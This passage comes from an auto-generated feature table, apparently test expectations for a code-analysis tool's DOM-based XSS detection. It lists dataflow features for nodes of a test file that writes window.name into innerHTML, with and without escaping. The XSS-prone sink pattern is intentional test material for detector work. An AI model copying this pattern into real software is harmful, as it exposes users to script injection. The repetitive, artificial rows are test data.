    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | | autogenerated/Xss/DomBasedXss/sanitiser.js:18:19:18:91 | "" | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:18:19:18:91 | "" | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:34:18:43 | escapeAttr | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:34:18:43 | escapeAttr | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:34:18:43 | escapeAttr | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:34:18:43 | escapeAttr | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:34:18:43 | escapeAttr | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:18:34:18:52 | escapeAttr(tainted) | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | | autogenerated/Xss/DomBasedXss/sanitiser.js:18:34:18:52 | escapeAttr(tainted) | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/sanitiser.js:18:34:18:52 | escapeAttr(tainted) | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | | autogenerated/Xss/DomBasedXss/sanitiser.js:18:34:18:52 | escapeAttr(tainted) | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:18:34:18:52 | escapeAttr(tainted) | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:18:34:18:52 | escapeAttr(tainted) | stringConcatenatedWith | '' + escapeHtml() + '' | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:34:18:52 | exceptional return of escapeAttr(tainted) | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:34:18:52 | exceptional return of escapeAttr(tainted) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:34:18:52 | exceptional return of escapeAttr(tainted) | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:34:18:52 | exceptional return of escapeAttr(tainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:34:18:52 | exceptional return of escapeAttr(tainted) | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:18:56:18:60 | "\\">" | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | | autogenerated/Xss/DomBasedXss/sanitiser.js:18:56:18:60 | "\\">" | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/sanitiser.js:18:56:18:60 | "\\">" | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | | autogenerated/Xss/DomBasedXss/sanitiser.js:18:56:18:60 | "\\">" | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:18:56:18:60 | "\\">" | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:18:56:18:60 | "\\">" | stringConcatenatedWith | ' escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:64:18:73 | escapeHtml | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:64:18:73 | escapeHtml | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:18:64:18:82 | escapeHtml(tainted) | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | | autogenerated/Xss/DomBasedXss/sanitiser.js:18:64:18:82 | escapeHtml(tainted) | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/sanitiser.js:18:64:18:82 | escapeHtml(tainted) | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | | autogenerated/Xss/DomBasedXss/sanitiser.js:18:64:18:82 | escapeHtml(tainted) | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:18:64:18:82 | escapeHtml(tainted) | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:18:64:18:82 | escapeHtml(tainted) | stringConcatenatedWith | '' -endpoint- '' | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:64:18:82 | exceptional return of escapeHtml(tainted) | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:64:18:82 | exceptional return of escapeHtml(tainted) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:64:18:82 | exceptional return of escapeHtml(tainted) | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:64:18:82 | exceptional return of escapeHtml(tainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:64:18:82 | exceptional return of escapeHtml(tainted) | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:18:86:18:91 | "" | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | | autogenerated/Xss/DomBasedXss/sanitiser.js:18:86:18:91 | "" | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/sanitiser.js:18:86:18:91 | "" | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | | autogenerated/Xss/DomBasedXss/sanitiser.js:18:86:18:91 | "" | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:18:86:18:91 | "" | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:18:86:18:91 | "" | stringConcatenatedWith | '' + escapeHtml() -endpoint- | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:3:19:5 | elt | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:3:19:5 | elt | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:3:19:5 | elt | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:3:19:5 | elt | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:3:19:5 | elt | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:3:19:15 | elt.innerHTML | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:3:19:15 | elt.innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:3:19:15 | elt.innerHTML | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:3:19:15 | elt.innerHTML | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:3:19:15 | elt.innerHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:3:19:58 | elt.inn ...
    " | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:3:19:58 | elt.inn ...
    " | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:3:19:58 | elt.inn ...
    " | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:3:19:58 | elt.inn ...
    " | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:3:19:58 | elt.inn ...
    " | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:7:19:15 | innerHTML | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:7:19:15 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:7:19:15 | innerHTML | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:7:19:15 | innerHTML | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:7:19:15 | innerHTML | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:19:19:19:25 | "
    " | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | | autogenerated/Xss/DomBasedXss/sanitiser.js:19:19:19:25 | "
    " | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/sanitiser.js:19:19:19:25 | "
    " | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | | autogenerated/Xss/DomBasedXss/sanitiser.js:19:19:19:25 | "
    " | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:19:19:19:25 | "
    " | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:19:19:19:25 | "
    " | stringConcatenatedWith | -endpoint- escapeAttr() + '
    ' | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:19:19:47 | "
    " ... ainted) | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:19:19:47 | "
    " ... ainted) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:19:19:47 | "
    " ... ainted) | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:19:19:47 | "
    " ... ainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:19:19:47 | "
    " ... ainted) | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:19:19:19:58 | "
    " ...
    " | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/sanitiser.js:19:19:19:58 | "
    " ...
    " | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | | autogenerated/Xss/DomBasedXss/sanitiser.js:19:19:19:58 | "
    " ...
    " | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/sanitiser.js:19:19:19:58 | "
    " ...
    " | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | | autogenerated/Xss/DomBasedXss/sanitiser.js:19:19:19:58 | "
    " ...
    " | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:19:19:19:58 | "
    " ...
    " | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:29:19:38 | escapeAttr | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:29:19:38 | escapeAttr | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:29:19:38 | escapeAttr | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:29:19:38 | escapeAttr | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:29:19:38 | escapeAttr | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:19:29:19:47 | escapeAttr(tainted) | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | | autogenerated/Xss/DomBasedXss/sanitiser.js:19:29:19:47 | escapeAttr(tainted) | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/sanitiser.js:19:29:19:47 | escapeAttr(tainted) | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | | autogenerated/Xss/DomBasedXss/sanitiser.js:19:29:19:47 | escapeAttr(tainted) | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:19:29:19:47 | escapeAttr(tainted) | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:19:29:19:47 | escapeAttr(tainted) | stringConcatenatedWith | '
    ' -endpoint- '
    ' | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:29:19:47 | exceptional return of escapeAttr(tainted) | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:29:19:47 | exceptional return of escapeAttr(tainted) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:29:19:47 | exceptional return of escapeAttr(tainted) | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:29:19:47 | exceptional return of escapeAttr(tainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:19:29:19:47 | exceptional return of escapeAttr(tainted) | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:19:51:19:58 | "
    " | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | | autogenerated/Xss/DomBasedXss/sanitiser.js:19:51:19:58 | "
    " | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/sanitiser.js:19:51:19:58 | "
    " | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | | autogenerated/Xss/DomBasedXss/sanitiser.js:19:51:19:58 | "
    " | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:19:51:19:58 | "
    " | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:19:51:19:58 | "
    " | stringConcatenatedWith | '
    ' + escapeAttr() -endpoint- | +| autogenerated/Xss/DomBasedXss/sanitiser.js:21:9:21:13 | regex | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:21:9:21:13 | regex | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:21:9:21:13 | regex | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:21:9:21:13 | regex | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:21:9:21:13 | regex | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:21:9:21:25 | regex | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:21:9:21:25 | regex | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:21:9:21:25 | regex | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:21:9:21:25 | regex | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:21:9:21:25 | regex | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:21:9:21:25 | regex = /[<>'"&]/ | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:21:9:21:25 | regex = /[<>'"&]/ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:21:9:21:25 | regex = /[<>'"&]/ | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:21:9:21:25 | regex = /[<>'"&]/ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:21:9:21:25 | regex = /[<>'"&]/ | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:21:17:21:25 | /[<>'"&]/ | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:21:17:21:25 | /[<>'"&]/ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:21:17:21:25 | /[<>'"&]/ | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:21:17:21:25 | /[<>'"&]/ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:21:17:21:25 | /[<>'"&]/ | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:22:7:22:11 | regex | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:22:7:22:11 | regex | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:22:7:22:11 | regex | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:22:7:22:11 | regex | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:22:7:22:11 | regex | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:22:7:22:16 | regex.test | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:22:7:22:16 | regex.test | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:22:7:22:16 | regex.test | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:22:7:22:16 | regex.test | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:22:7:22:16 | regex.test | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:22:7:22:25 | exceptional return of regex.test(tainted) | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:22:7:22:25 | exceptional return of regex.test(tainted) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:22:7:22:25 | exceptional return of regex.test(tainted) | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:22:7:22:25 | exceptional return of regex.test(tainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:22:7:22:25 | exceptional return of regex.test(tainted) | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:22:7:22:25 | regex.test(tainted) | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:22:7:22:25 | regex.test(tainted) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:22:7:22:25 | regex.test(tainted) | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
